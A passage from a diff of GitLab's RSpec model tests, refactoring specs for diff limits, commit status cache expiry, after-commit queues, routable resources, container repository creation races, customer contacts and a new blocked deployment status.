'when configurable_diff_limits is enabled' do - let(:configurable_diff_limits) { true } - - it 'returns the current settings' do - Gitlab::CurrentSettings.update!(diff_max_files: 1234) - expect(diff_max_files).to eq(1234) - end - end - - context 'when neither feature flag is 
enabled' do - it 'returns 1000' do - expect(diff_max_files).to eq(1000) - end + it 'returns the current settings' do + Gitlab::CurrentSettings.update!(diff_max_files: 1234) + expect(diff_max_files).to eq(1234) end end describe '.diff_max_lines' do subject(:diff_max_lines) { described_class.diff_max_lines } - let(:increased_diff_limits) { false } - let(:configurable_diff_limits) { false } - - before do - stub_feature_flags(increased_diff_limits: increased_diff_limits, configurable_diff_limits: configurable_diff_limits) - end - - context 'when increased_diff_limits is enabled' do - let(:increased_diff_limits) { true } - - it 'returns 100000' do - expect(diff_max_lines).to eq(100000) - end - end - - context 'when configurable_diff_limits is enabled' do - let(:configurable_diff_limits) { true } - - it 'returns the current settings' do - Gitlab::CurrentSettings.update!(diff_max_lines: 65321) - expect(diff_max_lines).to eq(65321) - end - end - - context 'when neither feature flag is enabled' do - it 'returns 50000' do - expect(diff_max_lines).to eq(50000) - end + it 'returns the current settings' do + Gitlab::CurrentSettings.update!(diff_max_lines: 65321) + expect(diff_max_lines).to eq(65321) end end diff --git a/spec/models/commit_status_spec.rb b/spec/models/commit_status_spec.rb index 59d14574c02..665a2a936af 100644 --- a/spec/models/commit_status_spec.rb +++ b/spec/models/commit_status_spec.rb @@ -46,10 +46,28 @@ RSpec.describe CommitStatus do describe 'status state machine' do let!(:commit_status) { create(:commit_status, :running, project: project) } - it 'invalidates the cache after a transition' do - expect(ExpireJobCacheWorker).to receive(:perform_async).with(commit_status.id) + context 'when expire_job_and_pipeline_cache_synchronously is enabled' do + before do + stub_feature_flags(expire_job_and_pipeline_cache_synchronously: true) + end + + it 'invalidates the cache after a transition' do + expect(commit_status).to receive(:expire_etag_cache!) 
- commit_status.success! + commit_status.success! + end + end + + context 'when expire_job_and_pipeline_cache_synchronously is disabled' do + before do + stub_feature_flags(expire_job_and_pipeline_cache_synchronously: false) + end + + it 'invalidates the cache after a transition' do + expect(ExpireJobCacheWorker).to receive(:perform_async).with(commit_status.id) + + commit_status.success! + end end describe 'transitioning to running' do @@ -97,32 +115,6 @@ RSpec.describe CommitStatus do end end - describe '.updated_before' do - let!(:lookback) { 5.days.ago } - let!(:timeout) { 1.day.ago } - let!(:before_lookback) { lookback - 1.hour } - let!(:after_lookback) { lookback + 1.hour } - let!(:before_timeout) { timeout - 1.hour } - let!(:after_timeout) { timeout + 1.hour } - - subject { described_class.updated_before(lookback: lookback, timeout: timeout) } - - def create_build_with_set_timestamps(created_at:, updated_at:) - travel_to(created_at) { create(:ci_build, created_at: Time.current) }.tap do |build| - travel_to(updated_at) { build.update!(status: :failed) } - end - end - - it 'finds builds updated and created in the window between lookback and timeout' do - build_in_lookback_timeout_window = create_build_with_set_timestamps(created_at: after_lookback, updated_at: before_timeout) - build_outside_lookback_window = create_build_with_set_timestamps(created_at: before_lookback, updated_at: before_timeout) - build_outside_timeout_window = create_build_with_set_timestamps(created_at: after_lookback, updated_at: after_timeout) - - expect(subject).to contain_exactly(build_in_lookback_timeout_window) - expect(subject).not_to include(build_outside_lookback_window, build_outside_timeout_window) - end - end - describe '.scheduled_at_before' do let!(:never_scheduled) { create(:commit_status) } let!(:stale_scheduled) { create(:commit_status, scheduled_at: 1.day.ago) } @@ -773,6 +765,14 @@ RSpec.describe CommitStatus do it_behaves_like 'incrementing failure reason counter' end + 
+ context 'when status is manual' do + let(:commit_status) { create(:commit_status, :manual) } + + it 'is able to be dropped' do + expect { commit_status.drop! }.to change { commit_status.status }.from('manual').to('failed') + end + end end describe 'ensure stage assignment' do @@ -958,4 +958,32 @@ RSpec.describe CommitStatus do expect(build_from_other_pipeline.reload).to have_attributes(retried: false, processed: false) end end + + describe '.bulk_insert_tags!' do + let(:statuses) { double('statuses') } + let(:tag_list_by_build) { double('tag list') } + let(:inserter) { double('inserter') } + + it 'delegates to bulk insert class' do + expect(Gitlab::Ci::Tags::BulkInsert) + .to receive(:new) + .with(statuses, tag_list_by_build) + .and_return(inserter) + + expect(inserter).to receive(:insert!) + + described_class.bulk_insert_tags!(statuses, tag_list_by_build) + end + end + + describe '#expire_etag_cache!' do + it 'expires the etag cache' do + expect_next_instance_of(Gitlab::EtagCaching::Store) do |etag_store| + job_path = Gitlab::Routing.url_helpers.project_build_path(project, commit_status.id, format: :json) + expect(etag_store).to receive(:touch).with(job_path) + end + + commit_status.expire_etag_cache! + end + end end diff --git a/spec/models/concerns/after_commit_queue_spec.rb b/spec/models/concerns/after_commit_queue_spec.rb new file mode 100644 index 00000000000..40cddde333e --- /dev/null +++ b/spec/models/concerns/after_commit_queue_spec.rb @@ -0,0 +1,128 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe AfterCommitQueue do + describe '#run_after_commit' do + it 'runs after record is saved' do + called = false + test_proc = proc { called = true } + + project = build(:project) + project.run_after_commit(&test_proc) + + expect(called).to be false + + # save! is run in its own transaction + project.save! 
+ + expect(called).to be true + end + + it 'runs after transaction is committed' do + called = false + test_proc = proc { called = true } + + project = build(:project) + + Project.transaction do + project.run_after_commit(&test_proc) + + project.save! + + expect(called).to be false + end + + expect(called).to be true + end + end + + describe '#run_after_commit_or_now' do + it 'runs immediately if not within a transction' do + called = false + test_proc = proc { called = true } + + project = build(:project) + + project.run_after_commit_or_now(&test_proc) + + expect(called).to be true + end + + it 'runs after transaction has completed' do + called = false + test_proc = proc { called = true } + + project = build(:project) + + Project.transaction do + # Add this record to the current transaction so that after commit hooks + # are called + Project.connection.add_transaction_record(project) + + project.run_after_commit_or_now(&test_proc) + + project.save! + + expect(called).to be false + end + + expect(called).to be true + end + + context 'multiple databases - Ci::ApplicationRecord models' do + before do + skip_if_multiple_databases_not_setup + + table_sql = <<~SQL + CREATE TABLE _test_ci_after_commit_queue ( + id serial NOT NULL PRIMARY KEY); + SQL + + ::Ci::ApplicationRecord.connection.execute(table_sql) + end + + let(:ci_klass) do + Class.new(Ci::ApplicationRecord) do + self.table_name = '_test_ci_after_commit_queue' + + include AfterCommitQueue + + def self.name + 'TestCiAfterCommitQueue' + end + end + end + + let(:ci_record) { ci_klass.new } + + it 'runs immediately if not within a transaction' do + called = false + test_proc = proc { called = true } + + ci_record.run_after_commit_or_now(&test_proc) + + expect(called).to be true + end + + it 'runs after transaction has completed' do + called = false + test_proc = proc { called = true } + + Ci::ApplicationRecord.transaction do + # Add this record to the current transaction so that after commit hooks + # are called + 
Ci::ApplicationRecord.connection.add_transaction_record(ci_record) + + ci_record.run_after_commit_or_now(&test_proc) + + ci_record.save! + + expect(called).to be false + end + + expect(called).to be true + end + end + end +end diff --git a/spec/models/concerns/case_sensitivity_spec.rb b/spec/models/concerns/case_sensitivity_spec.rb index 269f9577267..6e624c687c4 100644 --- a/spec/models/concerns/case_sensitivity_spec.rb +++ b/spec/models/concerns/case_sensitivity_spec.rb @@ -9,11 +9,12 @@ RSpec.describe CaseSensitivity do Class.new(ActiveRecord::Base) do include CaseSensitivity self.table_name = 'namespaces' + self.inheritance_column = :_type_disabled end end - let_it_be(:model_1) { model.create!(path: 'mOdEl-1', name: 'mOdEl 1') } - let_it_be(:model_2) { model.create!(path: 'mOdEl-2', name: 'mOdEl 2') } + let_it_be(:model_1) { model.create!(path: 'mOdEl-1', name: 'mOdEl 1', type: Namespaces::UserNamespace.sti_name) } + let_it_be(:model_2) { model.create!(path: 'mOdEl-2', name: 'mOdEl 2', type: Group.sti_name) } it 'finds a single instance by a single attribute regardless of case' do expect(model.iwhere(path: 'MODEL-1')).to contain_exactly(model_1) diff --git a/spec/models/concerns/group_descendant_spec.rb b/spec/models/concerns/group_descendant_spec.rb index b29fa910ee6..d593d829dca 100644 --- a/spec/models/concerns/group_descendant_spec.rb +++ b/spec/models/concerns/group_descendant_spec.rb @@ -19,14 +19,16 @@ RSpec.describe GroupDescendant do query_count = ActiveRecord::QueryRecorder.new { test_group.hierarchy }.count - expect(query_count).to eq(1) + # use_traversal_ids_for_ancestors_upto actor based feature flag check adds an extra query. 
+ expect(query_count).to eq(2) end it 'only queries once for the ancestors when a top is given' do test_group = create(:group, parent: subsub_group).reload recorder = ActiveRecord::QueryRecorder.new { test_group.hierarchy(subgroup) } - expect(recorder.count).to eq(1) + # use_traversal_ids_for_ancestors_upto actor based feature flag check adds an extra query. + expect(recorder.count).to eq(2) end it 'builds a hierarchy for a group' do diff --git a/spec/models/concerns/loose_foreign_key_spec.rb b/spec/models/concerns/loose_foreign_key_spec.rb deleted file mode 100644 index 42da69eb75e..00000000000 --- a/spec/models/concerns/loose_foreign_key_spec.rb +++ /dev/null @@ -1,66 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe LooseForeignKey do - let(:project_klass) do - Class.new(ApplicationRecord) do - include LooseForeignKey - - self.table_name = 'projects' - - loose_foreign_key :issues, :project_id, on_delete: :async_delete - loose_foreign_key 'merge_requests', 'project_id', 'on_delete' => 'async_nullify' - end - end - - it 'exposes the loose foreign key definitions' do - definitions = project_klass.loose_foreign_key_definitions - - tables = definitions.map(&:to_table) - expect(tables).to eq(%w[issues merge_requests]) - end - - it 'casts strings to symbol' do - definition = project_klass.loose_foreign_key_definitions.last - - expect(definition.from_table).to eq('projects') - expect(definition.to_table).to eq('merge_requests') - expect(definition.column).to eq('project_id') - expect(definition.on_delete).to eq(:async_nullify) - end - - context 'validation' do - context 'on_delete validation' do - let(:invalid_class) do - Class.new(ApplicationRecord) do - include LooseForeignKey - - self.table_name = 'projects' - - loose_foreign_key :issues, :project_id, on_delete: :async_delete - loose_foreign_key :merge_requests, :project_id, on_delete: :async_nullify - loose_foreign_key :merge_requests, :project_id, on_delete: :destroy - end - end - - 
it 'raises error when invalid `on_delete` option was given' do - expect { invalid_class }.to raise_error /Invalid on_delete option given: destroy/ - end - end - - context 'inheritance validation' do - let(:inherited_project_class) do - Class.new(Project) do - include LooseForeignKey - - loose_foreign_key :issues, :project_id, on_delete: :async_delete - end - end - - it 'raises error when loose_foreign_key is defined in a child ActiveRecord model' do - expect { inherited_project_class }.to raise_error /Please define the loose_foreign_key on the Project class/ - end - end - end -end diff --git a/spec/models/concerns/participable_spec.rb b/spec/models/concerns/participable_spec.rb index 903c7ae16b6..50cf7377b99 100644 --- a/spec/models/concerns/participable_spec.rb +++ b/spec/models/concerns/participable_spec.rb @@ -51,7 +51,9 @@ RSpec.describe Participable do end it 'supports attributes returning another Participable' do - other_model = Class.new { include Participable } + other_model = Class.new do + include Participable + end other_model.participant(:bar) model.participant(:foo) @@ -115,6 +117,76 @@ RSpec.describe Participable do end end + describe '#visible_participants' do + before do + allow(Ability).to receive(:allowed?).and_call_original + allow(Ability).to receive(:allowed?).with(anything, :read_class, anything) { readable } + end + + let(:readable) { true } + + it 'returns the list of participants' do + model.participant(:foo) + model.participant(:bar) + + user1 = build(:user) + user2 = build(:user) + user3 = build(:user) + project = build(:project, :public) + instance = model.new + + allow(instance).to receive_message_chain(:model_name, :element) { 'class' } + expect(instance).to receive(:foo).and_return(user2) + expect(instance).to receive(:bar).and_return(user3) + expect(instance).to receive(:project).thrice.and_return(project) + + participants = instance.visible_participants(user1) + + expect(participants).to include(user2) + expect(participants).to 
include(user3) + end + + context 'when Participable is not readable by the user' do + let(:readable) { false } + + it 'does not return unavailable participants' do + model.participant(:bar) + + instance = model.new + user1 = build(:user) + user2 = build(:user) + project = build(:project, :public) + + allow(instance).to receive_message_chain(:model_name, :element) { 'class' } + allow(instance).to receive(:bar).and_return(user2) + expect(instance).to receive(:project).thrice.and_return(project) + + expect(instance.visible_participants(user1)).to be_empty + end + + context 'when feature flag is disabled' do + before do + stub_feature_flags(verify_participants_access: false) + end + + it 'returns unavailable participants' do + model.participant(:bar) + + instance = model.new + user1 = build(:user) + user2 = build(:user) + project = build(:project, :public) + + allow(instance).to receive_message_chain(:model_name, :element) { 'class' } + allow(instance).to receive(:bar).and_return(user2) + expect(instance).to receive(:project).thrice.and_return(project) + + expect(instance.visible_participants(user1)).to match_array([user2]) + end + end + end + end + describe '#participant?' 
do let(:instance) { model.new } diff --git a/spec/models/concerns/routable_spec.rb b/spec/models/concerns/routable_spec.rb index 0a433a8cf4f..2330147b376 100644 --- a/spec/models/concerns/routable_spec.rb +++ b/spec/models/concerns/routable_spec.rb @@ -2,7 +2,7 @@ require 'spec_helper' -RSpec.shared_examples '.find_by_full_path' do +RSpec.shared_examples 'routable resource' do describe '.find_by_full_path', :aggregate_failures do it 'finds records by their full path' do expect(described_class.find_by_full_path(record.full_path)).to eq(record) @@ -52,13 +52,27 @@ RSpec.shared_examples '.find_by_full_path' do end end -RSpec.describe Routable do - it_behaves_like '.find_by_full_path' do - let_it_be(:record) { create(:group) } +RSpec.shared_examples 'routable resource with parent' do + it_behaves_like 'routable resource' + + describe '#full_path' do + it { expect(record.full_path).to eq "#{record.parent.full_path}/#{record.path}" } + + it 'hits the cache when not preloaded' do + forcibly_hit_cached_lookup(record, :full_path) + + expect(record.full_path).to eq("#{record.parent.full_path}/#{record.path}") + end end - it_behaves_like '.find_by_full_path' do - let_it_be(:record) { create(:project) } + describe '#full_name' do + it { expect(record.full_name).to eq "#{record.parent.human_name} / #{record.name}" } + + it 'hits the cache when not preloaded' do + forcibly_hit_cached_lookup(record, :full_name) + + expect(record.full_name).to eq("#{record.parent.human_name} / #{record.name}") + end end end @@ -66,6 +80,14 @@ RSpec.describe Group, 'Routable', :with_clean_rails_cache do let_it_be_with_reload(:group) { create(:group, name: 'foo') } let_it_be(:nested_group) { create(:group, parent: group) } + it_behaves_like 'routable resource' do + let_it_be(:record) { group } + end + + it_behaves_like 'routable resource with parent' do + let_it_be(:record) { nested_group } + end + describe 'Validations' do it { is_expected.to validate_presence_of(:route) } end @@ -119,24 +141,6 @@ 
RSpec.describe Group, 'Routable', :with_clean_rails_cache do end end - describe '.find_by_full_path' do - it_behaves_like '.find_by_full_path' do - let_it_be(:record) { group } - end - - it_behaves_like '.find_by_full_path' do - let_it_be(:record) { nested_group } - end - - it 'does not find projects with a matching path' do - project = create(:project) - redirect_route = create(:redirect_route, source: project) - - expect(described_class.find_by_full_path(project.full_path)).to be_nil - expect(described_class.find_by_full_path(redirect_route.path, follow_redirects: true)).to be_nil - end - end - describe '.where_full_path_in' do context 'without any paths' do it 'returns an empty relation' do @@ -195,64 +199,39 @@ RSpec.describe Group, 'Routable', :with_clean_rails_cache do expect(group.route_loaded?).to be_truthy end end - - describe '#full_path' do - it { expect(group.full_path).to eq(group.path) } - it { expect(nested_group.full_path).to eq("#{group.full_path}/#{nested_group.path}") } - - it 'hits the cache when not preloaded' do - forcibly_hit_cached_lookup(nested_group, :full_path) - - expect(nested_group.full_path).to eq("#{group.full_path}/#{nested_group.path}") - end - end - - describe '#full_name' do - it { expect(group.full_name).to eq(group.name) } - it { expect(nested_group.full_name).to eq("#{group.name} / #{nested_group.name}") } - - it 'hits the cache when not preloaded' do - forcibly_hit_cached_lookup(nested_group, :full_name) - - expect(nested_group.full_name).to eq("#{group.name} / #{nested_group.name}") - end - end end RSpec.describe Project, 'Routable', :with_clean_rails_cache do let_it_be(:namespace) { create(:namespace) } let_it_be(:project) { create(:project, namespace: namespace) } - it_behaves_like '.find_by_full_path' do + it_behaves_like 'routable resource with parent' do let_it_be(:record) { project } end +end - it 'does not find groups with a matching path' do - group = create(:group) - redirect_route = create(:redirect_route, source: 
group) - - expect(described_class.find_by_full_path(group.full_path)).to be_nil - expect(described_class.find_by_full_path(redirect_route.path, follow_redirects: true)).to be_nil - end - - describe '#full_path' do - it { expect(project.full_path).to eq "#{namespace.full_path}/#{project.path}" } - - it 'hits the cache when not preloaded' do - forcibly_hit_cached_lookup(project, :full_path) - - expect(project.full_path).to eq("#{namespace.full_path}/#{project.path}") +RSpec.describe Namespaces::ProjectNamespace, 'Routable', :with_clean_rails_cache do + let_it_be(:group) { create(:group) } + let_it_be(:project_namespace) do + # For now we create only project namespace w/o project, otherwise same path + # would be used for project and project namespace. + # This can be removed when route is created automatically for project namespaces. + # https://gitlab.com/gitlab-org/gitlab/-/issues/346448 + create(:project_namespace, project: nil, parent: group, + visibility_level: Gitlab::VisibilityLevel::PUBLIC, + path: 'foo', name: 'foo').tap do |project_namespace| + Route.create!(source: project_namespace, path: project_namespace.full_path, + name: project_namespace.full_name) end end - describe '#full_name' do - it { expect(project.full_name).to eq "#{namespace.human_name} / #{project.name}" } - - it 'hits the cache when not preloaded' do - forcibly_hit_cached_lookup(project, :full_name) + # we have couple of places where we use generic Namespace, in that case + # we don't want to include ProjectNamespace routes yet + it 'ignores project namespace when searching for generic namespace' do + redirect_route = create(:redirect_route, source: project_namespace) - expect(project.full_name).to eq("#{namespace.human_name} / #{project.name}") - end + expect(Namespace.find_by_full_path(project_namespace.full_path)).to be_nil + expect(Namespace.find_by_full_path(redirect_route.path, follow_redirects: true)).to be_nil end end diff --git a/spec/models/concerns/sha_attribute_spec.rb 
b/spec/models/concerns/sha_attribute_spec.rb index 220eadfab92..1bcf3dc8b61 100644 --- a/spec/models/concerns/sha_attribute_spec.rb +++ b/spec/models/concerns/sha_attribute_spec.rb @@ -3,7 +3,7 @@ require 'spec_helper' RSpec.describe ShaAttribute do - let(:model) { Class.new(ApplicationRecord) { include ShaAttribute } } + let(:model) { Class.new(ActiveRecord::Base) { include ShaAttribute } } before do columns = [ diff --git a/spec/models/concerns/transactions_spec.rb b/spec/models/concerns/transactions_spec.rb new file mode 100644 index 00000000000..404a33196e6 --- /dev/null +++ b/spec/models/concerns/transactions_spec.rb @@ -0,0 +1,21 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Transactions do + let(:model) { build(:project) } + + it 'is not in a transaction' do + expect(model.class).not_to be_inside_transaction + end + + it 'is in a transaction', :aggregate_failures do + Project.transaction do + expect(model.class).to be_inside_transaction + end + + ApplicationRecord.transaction do + expect(model.class).to be_inside_transaction + end + end +end diff --git a/spec/models/container_repository_spec.rb b/spec/models/container_repository_spec.rb index 846dfb30928..51fdbfebd3a 100644 --- a/spec/models/container_repository_spec.rb +++ b/spec/models/container_repository_spec.rb @@ -223,9 +223,9 @@ RSpec.describe ContainerRepository do end end - describe '.create_from_path!' 
do + describe '.find_or_create_from_path' do let(:repository) do - described_class.create_from_path!(ContainerRegistry::Path.new(path)) + described_class.find_or_create_from_path(ContainerRegistry::Path.new(path)) end let(:repository_path) { ContainerRegistry::Path.new(path) } @@ -291,6 +291,35 @@ RSpec.describe ContainerRepository do expect(repository.id).to eq(container_repository.id) end end + + context 'when many of the same repository are created at the same time' do + let(:path) { ContainerRegistry::Path.new(project.full_path + '/some/image') } + + it 'does not throw validation errors and only creates one repository' do + expect { repository_creation_race(path) }.to change { ContainerRepository.count }.by(1) + end + + it 'retrieves a persisted repository for all concurrent calls' do + repositories = repository_creation_race(path).map(&:value) + + expect(repositories).to all(be_persisted) + end + end + + def repository_creation_race(path) + # create a race condition - structure from https://blog.arkency.com/2015/09/testing-race-conditions/ + wait_for_it = true + + threads = Array.new(10) do |i| + Thread.new do + true while wait_for_it + + ::ContainerRepository.find_or_create_from_path(path) + end + end + wait_for_it = false + threads.each(&:join) + end end describe '.build_root_repository' do diff --git a/spec/models/customer_relations/contact_spec.rb b/spec/models/customer_relations/contact_spec.rb index 3a2d4e2d0ca..7e26d324ac2 100644 --- a/spec/models/customer_relations/contact_spec.rb +++ b/spec/models/customer_relations/contact_spec.rb @@ -36,4 +36,27 @@ RSpec.describe CustomerRelations::Contact, type: :model do expect(contact.phone).to eq('123456') end end + + describe '#self.find_ids_by_emails' do + let_it_be(:group) { create(:group) } + let_it_be(:group_contacts) { create_list(:contact, 2, group: group) } + let_it_be(:other_contacts) { create_list(:contact, 2) } + + it 'returns ids of contacts from group' do + contact_ids = 
described_class.find_ids_by_emails(group.id, group_contacts.pluck(:email)) + + expect(contact_ids).to match_array(group_contacts.pluck(:id)) + end + + it 'does not return ids of contacts from other groups' do + contact_ids = described_class.find_ids_by_emails(group.id, other_contacts.pluck(:email)) + + expect(contact_ids).to be_empty + end + + it 'raises ArgumentError when called with too many emails' do + too_many_emails = described_class::MAX_PLUCK + 1 + expect { described_class.find_ids_by_emails(group.id, Array(0..too_many_emails)) }.to raise_error(ArgumentError) + end + end end diff --git a/spec/models/customer_relations/issue_contact_spec.rb b/spec/models/customer_relations/issue_contact_spec.rb index 3747d159833..474455a9884 100644 --- a/spec/models/customer_relations/issue_contact_spec.rb +++ b/spec/models/customer_relations/issue_contact_spec.rb @@ -4,6 +4,9 @@ require 'spec_helper' RSpec.describe CustomerRelations::IssueContact do let_it_be(:issue_contact, reload: true) { create(:issue_customer_relations_contact) } + let_it_be(:group) { create(:group) } + let_it_be(:project) { create(:project, group: group) } + let_it_be(:issue) { create(:issue, project: project) } subject { issue_contact } @@ -19,9 +22,6 @@ RSpec.describe CustomerRelations::IssueContact do let(:stubbed) { build_stubbed(:issue_customer_relations_contact) } let(:created) { create(:issue_customer_relations_contact) } - let(:group) { build(:group) } - let(:project) { build(:project, group: group) } - let(:issue) { build(:issue, project: project) } let(:contact) { build(:contact, group: group) } let(:for_issue) { build(:issue_customer_relations_contact, :for_issue, issue: issue) } let(:for_contact) { build(:issue_customer_relations_contact, :for_contact, contact: contact) } @@ -45,4 +45,26 @@ RSpec.describe CustomerRelations::IssueContact do expect(built).not_to be_valid end end + + describe '#self.find_contact_ids_by_emails' do + let_it_be(:for_issue) { 
create_list(:issue_customer_relations_contact, 2, :for_issue, issue: issue) } + let_it_be(:not_for_issue) { create_list(:issue_customer_relations_contact, 2) } + + it 'returns ids of contacts from issue' do + contact_ids = described_class.find_contact_ids_by_emails(issue.id, for_issue.map(&:contact).pluck(:email)) + + expect(contact_ids).to match_array(for_issue.pluck(:contact_id)) + end + + it 'does not return ids of contacts from other issues' do + contact_ids = described_class.find_contact_ids_by_emails(issue.id, not_for_issue.map(&:contact).pluck(:email)) + + expect(contact_ids).to be_empty + end + + it 'raises ArgumentError when called with too many emails' do + too_many_emails = described_class::MAX_PLUCK + 1 + expect { described_class.find_contact_ids_by_emails(issue.id, Array(0..too_many_emails)) }.to raise_error(ArgumentError) + end + end end diff --git a/spec/models/deployment_metrics_spec.rb b/spec/models/deployment_metrics_spec.rb index c804e20d66d..fe9218a9ae2 100644 --- a/spec/models/deployment_metrics_spec.rb +++ b/spec/models/deployment_metrics_spec.rb @@ -111,7 +111,7 @@ RSpec.describe DeploymentMetrics do } end - let(:prometheus_adapter) { instance_double('prometheus_adapter', can_query?: true, configured?: true) } + let(:prometheus_adapter) { instance_double(::Integrations::Prometheus, can_query?: true, configured?: true) } before do allow(deployment_metrics).to receive(:prometheus_adapter).and_return(prometheus_adapter) diff --git a/spec/models/deployment_spec.rb b/spec/models/deployment_spec.rb index 51e1e63da8d..29b37ef7371 100644 --- a/spec/models/deployment_spec.rb +++ b/spec/models/deployment_spec.rb @@ -268,31 +268,69 @@ RSpec.describe Deployment do end end + context 'when deployment is blocked' do + let(:deployment) { create(:deployment, :created) } + + it 'has correct status' do + deployment.block! 
+ + expect(deployment).to be_blocked + expect(deployment.finished_at).to be_nil + end + + it 'does not execute Deployments::LinkMergeRequestWorker asynchronously' do + expect(Deployments::LinkMergeRequestWorker).not_to receive(:perform_async) + + deployment.block! + end + + it 'does not execute Deployments::HooksWorker' do + expect(Deployments::HooksWorker).not_to receive(:perform_async) + + deployment.block! + end + end + describe 'synching status to Jira' do - let(:deployment) { create(:deployment) } + let_it_be(:project) { create(:project, :repository) } + let(:deployment) { create(:deployment, project: project) } let(:worker) { ::JiraConnect::SyncDeploymentsWorker } - it 'calls the worker on creation' do - expect(worker).to receive(:perform_async).with(Integer) + context 'when Jira Connect subscription does not exist' do + it 'does not call the worker' do + expect(worker).not_to receive(:perform_async) - deployment + deployment + end end - it 'does not call the worker for skipped deployments' do - expect(deployment).to be_present # warm-up, ignore the creation trigger + context 'when Jira Connect subscription exists' do + before_all do + create(:jira_connect_subscription, namespace: project.namespace) + end - expect(worker).not_to receive(:perform_async) + it 'calls the worker on creation' do + expect(worker).to receive(:perform_async).with(Integer) - deployment.skip! - end + deployment + end + + it 'does not call the worker for skipped deployments' do + expect(deployment).to be_present # warm-up, ignore the creation trigger + + expect(worker).not_to receive(:perform_async) + + deployment.skip! + end - %i[run! succeed! drop! cancel!].each do |event| - context "when we call pipeline.#{event}" do - it 'triggers a Jira synch worker' do - expect(worker).to receive(:perform_async).with(deployment.id) + %i[run! succeed! drop! 
cancel!].each do |event| + context "when we call pipeline.#{event}" do + it 'triggers a Jira synch worker' do + expect(worker).to receive(:perform_async).with(deployment.id) - deployment.send(event) + deployment.send(event) + end end end end @@ -448,11 +486,12 @@ RSpec.describe Deployment do subject { described_class.active } it 'retrieves the active deployments' do - deployment1 = create(:deployment, status: :created ) - deployment2 = create(:deployment, status: :running ) - create(:deployment, status: :failed ) - create(:deployment, status: :canceled ) + deployment1 = create(:deployment, status: :created) + deployment2 = create(:deployment, status: :running) + create(:deployment, status: :failed) + create(:deployment, status: :canceled) create(:deployment, status: :skipped) + create(:deployment, status: :blocked) is_expected.to contain_exactly(deployment1, deployment2) end @@ -512,9 +551,25 @@ RSpec.describe Deployment do deployment2 = create(:deployment, status: :success) deployment3 = create(:deployment, status: :failed) deployment4 = create(:deployment, status: :canceled) + deployment5 = create(:deployment, status: :blocked) + create(:deployment, status: :skipped) + + is_expected.to contain_exactly(deployment1, deployment2, deployment3, deployment4, deployment5) + end + end + + describe 'upcoming' do + subject { described_class.upcoming } + + it 'retrieves the upcoming deployments' do + deployment1 = create(:deployment, status: :running) + deployment2 = create(:deployment, status: :blocked) + create(:deployment, status: :success) + create(:deployment, status: :failed) + create(:deployment, status: :canceled) create(:deployment, status: :skipped) - is_expected.to contain_exactly(deployment1, deployment2, deployment3, deployment4) + is_expected.to contain_exactly(deployment1, deployment2) end end end @@ -840,6 +895,27 @@ RSpec.describe Deployment do expect(deploy.update_status('created')).to eq(false) end + + context 'mapping status to event' do + using 
RSpec::Parameterized::TableSyntax + + where(:status, :method) do + 'running' | :run! + 'success' | :succeed! + 'failed' | :drop! + 'canceled' | :cancel! + 'skipped' | :skip! + 'blocked' | :block! + end + + with_them do + it 'calls the correct method for the given status' do + expect(deploy).to receive(method) + + deploy.update_status(status) + end + end + end end describe '#sync_status_with' do diff --git a/spec/models/dev_ops_report/metric_spec.rb b/spec/models/dev_ops_report/metric_spec.rb index 191692f43a4..8519217f719 100644 --- a/spec/models/dev_ops_report/metric_spec.rb +++ b/spec/models/dev_ops_report/metric_spec.rb @@ -5,6 +5,13 @@ require 'spec_helper' RSpec.describe DevOpsReport::Metric do let(:conv_dev_index) { create(:dev_ops_report_metric) } + describe 'validations' do + DevOpsReport::Metric::METRICS.each do |metric_name| + it { is_expected.to validate_presence_of(metric_name) } + it { is_expected.to validate_numericality_of(metric_name).is_greater_than_or_equal_to(0) } + end + end + describe '#percentage_score' do it 'returns stored percentage score' do expect(conv_dev_index.percentage_score('issues')).to eq(13.331) diff --git a/spec/models/environment_spec.rb b/spec/models/environment_spec.rb index 9d9862aa3d3..3dd0e01d7b3 100644 --- a/spec/models/environment_spec.rb +++ b/spec/models/environment_spec.rb @@ -947,6 +947,12 @@ RSpec.describe Environment, :use_clean_rails_memory_store_caching do it { is_expected.to eq(deployment) } end + + context 'when environment has a blocked deployment' do + let!(:deployment) { create(:deployment, :blocked, environment: environment, project: project) } + + it { is_expected.to eq(deployment) } + end end describe '#has_terminals?' 
do diff --git a/spec/models/event_spec.rb b/spec/models/event_spec.rb index ee27eaf1d0b..97854086162 100644 --- a/spec/models/event_spec.rb +++ b/spec/models/event_spec.rb @@ -706,7 +706,7 @@ RSpec.describe Event do describe '.for_wiki_meta' do it 'finds events for a given wiki page metadata object' do - event = events.select(&:wiki_page?).first + event = events.find(&:wiki_page?) expect(described_class.for_wiki_meta(event.target)).to contain_exactly(event) end diff --git a/spec/models/external_pull_request_spec.rb b/spec/models/external_pull_request_spec.rb index bac2c369d7d..b141600c4fd 100644 --- a/spec/models/external_pull_request_spec.rb +++ b/spec/models/external_pull_request_spec.rb @@ -232,4 +232,8 @@ RSpec.describe ExternalPullRequest do 'with space/README.md'] end end + + it_behaves_like 'it has loose foreign keys' do + let(:factory_name) { :external_pull_request } + end end diff --git a/spec/models/group_spec.rb b/spec/models/group_spec.rb index 735aa4df2ba..fed4ee3f3a4 100644 --- a/spec/models/group_spec.rb +++ b/spec/models/group_spec.rb @@ -94,34 +94,6 @@ RSpec.describe Group do expect(group).to be_valid end end - - context 'when the feature flag `validate_namespace_parent_type` is disabled' do - before do - stub_feature_flags(validate_namespace_parent_type: false) - end - - context 'when the group has no parent' do - it 'allows a group to have no parent associated with it' do - group = build(:group) - - expect(group).to be_valid - end - end - - context 'when the group has a parent' do - it 'allows a group to have a namespace as its parent' do - group = build(:group, parent: build(:namespace)) - - expect(group).to be_valid - end - - it 'allows a group to have another group as its parent' do - group = build(:group, parent: build(:group)) - - expect(group).to be_valid - end - end - end end describe 'path validation' do @@ -533,6 +505,10 @@ RSpec.describe Group do describe '#ancestors' do it { expect(group.ancestors.to_sql).not_to include 'traversal_ids 
